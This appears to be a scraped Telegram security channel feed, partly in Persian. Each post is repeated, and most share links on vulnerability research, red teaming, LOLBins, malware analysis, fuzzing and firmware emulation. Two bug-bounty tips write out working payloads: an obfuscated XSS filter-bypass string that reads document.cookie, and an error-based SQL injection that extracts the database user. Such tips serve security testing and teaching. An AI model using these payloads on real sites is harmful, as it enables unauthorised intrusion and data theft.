Demystifying_Soft_Sec_Vulns.pdf
623.9 KB
Research
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023
]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology
@Engineer_Computer
Alert! 9 new ransomware families emerge from leaked Babuk source code, capable of targeting Linux and ESXi environments
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html
@Engineer_Computer
Injecting Payload In Phone Numbers field !
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
#infosec #bugbountytip #cybersecuritytips
@Engineer_Computer
XSS WAF Bypass using location concatenation:
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Some recent lessons learned:
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
⭕️ Building a Red Team Infrastructure in 2023
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#RedTeam
@Engineer_Computer
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#RedTeam
@Engineer_Computer
Systemsecurity
Building a Red Team Infrastructure in 2023
In this blog post an overview of the different components of a red team infrastructure is given. This includes explanations how these work, as well as the comparison of different solutions and their characteristics.
✨Three projects will help you a lot in Malware Analysis✨
✨سه پروژه به شما در تجزیه و تحلیل بدافزار کمک زیادی می کند✨
1️⃣https://filesec.io/#
لیستی از پسوندهای فایل است که می تواند توسط مهاجمان برای phishing, execution, و ماکروها و غیره استفاده شود.
این منبع خوبی برای درک موارد استفاده مخرب از file extentionsرایج و راه هایی است که می توانید در برابر آنها دفاع کنید.
2️⃣ Windows LOLBINS >> https://lolbas-project.github.io/#
کلمه LOLBins اصطلاح اختصاری Living Off the Land Binaries است. این سایت باینری هایی با ماهیت غیر مخرب، که برای سیستم عامل شناخته شده و قانونی هستند را نشان میدهد که توسط مجرمان سایبری برای استتار فعالیت های مخرب خود قابل استفاده و بهره برداری قرار است.
3️⃣ Linux GTFOBINS >> https://gtfobins.github.io/
این GTFOBins پروژهای است که توابع قانونی باینریهای یونیکس را جمعآوری میکند که میتوان از آن برای گرفتن شل، افزایش یا حفظ امتیازات بالا، انتقال فایلها، spawn bind و reverse shellها و تسهیل سایر وظایف پس از بهرهبرداری سوء استفاده کرد.
#blueteam #redteam #soc #forensiceanal #ioc #threatintelligence #threathunting
@Engineer_Computer
✨سه پروژه به شما در تجزیه و تحلیل بدافزار کمک زیادی می کند✨
1️⃣https://filesec.io/#
لیستی از پسوندهای فایل است که می تواند توسط مهاجمان برای phishing, execution, و ماکروها و غیره استفاده شود.
این منبع خوبی برای درک موارد استفاده مخرب از file extentionsرایج و راه هایی است که می توانید در برابر آنها دفاع کنید.
2️⃣ Windows LOLBINS >> https://lolbas-project.github.io/#
کلمه LOLBins اصطلاح اختصاری Living Off the Land Binaries است. این سایت باینری هایی با ماهیت غیر مخرب، که برای سیستم عامل شناخته شده و قانونی هستند را نشان میدهد که توسط مجرمان سایبری برای استتار فعالیت های مخرب خود قابل استفاده و بهره برداری قرار است.
3️⃣ Linux GTFOBINS >> https://gtfobins.github.io/
این GTFOBins پروژهای است که توابع قانونی باینریهای یونیکس را جمعآوری میکند که میتوان از آن برای گرفتن شل، افزایش یا حفظ امتیازات بالا، انتقال فایلها، spawn bind و reverse shellها و تسهیل سایر وظایف پس از بهرهبرداری سوء استفاده کرد.
#blueteam #redteam #soc #forensiceanal #ioc #threatintelligence #threathunting
@Engineer_Computer
🔰 دانستن اینکه چه چیزی در پردازش های ویندوز عادی است، به کاهش نویز در فرآیند جستجوی بدافزار احتمالی کمک میکند.
🔱 https://sansorg.egnyte.com/dl/oQm41D67D6
🔴 از این اطلاعات به عنوان مرجع برای پردازش های عادی ویندوز استفاده کنید و توجه خودتون رو به موارد دیگر معطوف کنید.
@Engineer_Computer
🔱 https://sansorg.egnyte.com/dl/oQm41D67D6
🔴 از این اطلاعات به عنوان مرجع برای پردازش های عادی ویندوز استفاده کنید و توجه خودتون رو به موارد دیگر معطوف کنید.
@Engineer_Computer
SANS-DFIR(iDeFense).pdf
1.9 MB
پوستر بالا رو هم از لینک بالا و هم از اینجا میتونید دانلود کنید.
@Engineer_Computer
@Engineer_Computer
How to bypass Cloudflare, Incapsula, SUCURI and another WAF
https://miloserdov.org/?p=2960
@Engineer_Computer
https://miloserdov.org/?p=2960
@Engineer_Computer
Threat Research
Outlook Patch Analysis Reveals Important Flaw in Windows API
https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
@Engineer_Computer
Outlook Patch Analysis Reveals Important Flaw in Windows API
https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
@Engineer_Computer
Akamai
From One Vulnerability to Another: Outlook Patch Analysis Reveals Important Flaw in Windows API | Akamai
Akamai researchers explore a new critical vulnerability in Windows that could lead to a bypass of CVE-2023-23397’s mitigation.
#هوش_مصنوعی
یک وبسایت عالی، تبدیل متن به ویدئو با هوش مصنوعی میتونید سناریو بنویسید و
به کلیپ تبدیل كنيد و یا اینکه یک عکس رو بدید و بگید به چه صورت اجرا بشه ، فوق العادهس این ابزار
https://app.kaiber.ai/
@Engineer_Computer
یک وبسایت عالی، تبدیل متن به ویدئو با هوش مصنوعی میتونید سناریو بنویسید و
به کلیپ تبدیل كنيد و یا اینکه یک عکس رو بدید و بگید به چه صورت اجرا بشه ، فوق العادهس این ابزار
https://app.kaiber.ai/
@Engineer_Computer
👍1
Analysis_ITW_Linux_Implants.pdf
4 MB
Threat Research
Practical CTI Analysis Over 2022 ITW Linux Implants: Detection Over Blind Spots 2023
@Engineer_Computer
Practical CTI Analysis Over 2022 ITW Linux Implants: Detection Over Blind Spots 2023
@Engineer_Computer
⚙️ Optimize Web Fuzzing
۲ تا نکته برای بهنیه کردن Fuzzing در وب سرور و API:
۱. نکته اول Fuzz کردن مسیر های 403:
اگر برای مثال به روت وب سروری درخواست زدید و به شما 403 داد بیاید به یک مسیر یونیک که مطمئن هستید وجود نداره درخواست بزنید مثلا:
/uniquePathUnique
اگر این مسیر هم به شما 403 داد Fuzz کردن رو این وب سرور میتونه کار بیهوده ای باشه: چون ادمین ممکن هست وب سرور رو به پشت VPN منتقل کرده باشه یا هر مسیری رو ممنوع کرده باشه
اگر قصد دارید فازینگ شما بهینه باشه و کمبود زمان و منابع دارید این نوع تارگت هارو بیخیال بشید یا در اولویت پایین تری برای Fuzz بذارید.
۲. نکته دوم Fuzz کردن مسیر در API:
در وب سرور ها مثل Apache اگر به دایرکتوری موجودی درخواست بزنید برای مثال دایرکتوری files/ ماژول mod_dir شمارو به /files/ ریدایرکت میکنه. این ماژول کارش trailing slash redirect هست یعنی یه / به آخر اسم دایرکتوری اضافه میکنه و دایرکتوری رو برای شما serve میکنه. به / آخر trailing slash میگیم.
اما در API ها به این گونه نیست عموما. در API دو مسیر زیر
/auth/login/
/auth/login
میتونند دو اندپوینت کاملا متفاوت از هم باشند و دو function جدا از هم یا اگر فانکشن لاگین در /auth/login/ باشد و شما به auth/login/ درخواست بزنید ممکن است 404 بگیرید.
این موضوع قابل کنترل هم هست برای مثال فریمورک flask در حالت عادی مثل سناریو بالا عمل میکنه اما اگر ما مقدار strict_slashes رو در Routing برابر False قرار بدیم مثل زیر
@app.route('/auth/login/', strict_slashes=False)
تفاوتی بین /auth/login/ و auth/login/ نخواهد بود.
برای بهینه سازی Fuzzing در اینجا شما باید اندپوینت های موجود رو Analyze کنید و مشاهده کنید برنامه نویس از کدوم style برای مسیر دهی استفاده کرده مثلا اگر تمام اندپوینت های API با trailing slash تمام می شوند شما نیز در Fuzzing خود از trailing slash استفاده کنید و اگر تمام اندپوینت ها بدون / تمام می شوند شما هم از trailing slash استفاده نکنید.
#web_security #fuzzing #API
@Engineer_Computer
۲ تا نکته برای بهنیه کردن Fuzzing در وب سرور و API:
۱. نکته اول Fuzz کردن مسیر های 403:
اگر برای مثال به روت وب سروری درخواست زدید و به شما 403 داد بیاید به یک مسیر یونیک که مطمئن هستید وجود نداره درخواست بزنید مثلا:
/uniquePathUnique
اگر این مسیر هم به شما 403 داد Fuzz کردن رو این وب سرور میتونه کار بیهوده ای باشه: چون ادمین ممکن هست وب سرور رو به پشت VPN منتقل کرده باشه یا هر مسیری رو ممنوع کرده باشه
اگر قصد دارید فازینگ شما بهینه باشه و کمبود زمان و منابع دارید این نوع تارگت هارو بیخیال بشید یا در اولویت پایین تری برای Fuzz بذارید.
۲. نکته دوم Fuzz کردن مسیر در API:
در وب سرور ها مثل Apache اگر به دایرکتوری موجودی درخواست بزنید برای مثال دایرکتوری files/ ماژول mod_dir شمارو به /files/ ریدایرکت میکنه. این ماژول کارش trailing slash redirect هست یعنی یه / به آخر اسم دایرکتوری اضافه میکنه و دایرکتوری رو برای شما serve میکنه. به / آخر trailing slash میگیم.
اما در API ها به این گونه نیست عموما. در API دو مسیر زیر
/auth/login/
/auth/login
میتونند دو اندپوینت کاملا متفاوت از هم باشند و دو function جدا از هم یا اگر فانکشن لاگین در /auth/login/ باشد و شما به auth/login/ درخواست بزنید ممکن است 404 بگیرید.
این موضوع قابل کنترل هم هست برای مثال فریمورک flask در حالت عادی مثل سناریو بالا عمل میکنه اما اگر ما مقدار strict_slashes رو در Routing برابر False قرار بدیم مثل زیر
@app.route('/auth/login/', strict_slashes=False)
تفاوتی بین /auth/login/ و auth/login/ نخواهد بود.
برای بهینه سازی Fuzzing در اینجا شما باید اندپوینت های موجود رو Analyze کنید و مشاهده کنید برنامه نویس از کدوم style برای مسیر دهی استفاده کرده مثلا اگر تمام اندپوینت های API با trailing slash تمام می شوند شما نیز در Fuzzing خود از trailing slash استفاده کنید و اگر تمام اندپوینت ها بدون / تمام می شوند شما هم از trailing slash استفاده نکنید.
#web_security #fuzzing #API
@Engineer_Computer
🔥1
⭕️ Discovery of an XSS on Opera
هانتر تو این مقاله از متدولوژی خودش که باهاش تونسته رو Opera آسیب پذیری XSS پیدا کنه میگه.
https://infosecwriteups.com/discovery-of-an-xss-on-opera-f029f6522ec5
Quickly Subdomain Discovery
- https://subdomainfinder.c99.nl/
Subdomain Brute Force
- https://github.com/guelfoweb/knock
Content Discovery
- https://github.com/projectdiscovery/katana/
- https://github.com/tomnomnom/waybackurls
#BugBounty #XSS #Recon
@Engineer_Computer
هانتر تو این مقاله از متدولوژی خودش که باهاش تونسته رو Opera آسیب پذیری XSS پیدا کنه میگه.
https://infosecwriteups.com/discovery-of-an-xss-on-opera-f029f6522ec5
Quickly Subdomain Discovery
- https://subdomainfinder.c99.nl/
Subdomain Brute Force
- https://github.com/guelfoweb/knock
Content Discovery
- https://github.com/projectdiscovery/katana/
- https://github.com/tomnomnom/waybackurls
#BugBounty #XSS #Recon
@Engineer_Computer
Medium
Discovery of an XSS on Opera
Discovering XSS in large companies is one of my hobbies. Today I want to talk about Opera XSS which took 15 minutes. The power of finding…
🔥1
⭕️ شبیه سازی IoT Firmware
اگر قصد تست امنیت یه hardware product رو دارید و اما نمی تونید physical device رو داشته باشید میتونید از یه شبیه ساز مثل QEMU استفاده کنید.
https://boschko.ca/qemu-emulating-firmware/
#IoT #emulator
@Engineer_Computer
اگر قصد تست امنیت یه hardware product رو دارید و اما نمی تونید physical device رو داشته باشید میتونید از یه شبیه ساز مثل QEMU استفاده کنید.
https://boschko.ca/qemu-emulating-firmware/
#IoT #emulator
@Engineer_Computer
Boschko Security Blog
Emulating IoT Firmware Made Easy: Start Hacking Without the Physical Device
A step-by-step how-to guide to using QEMU in Ubuntu 18.04 to emulate embedded devices.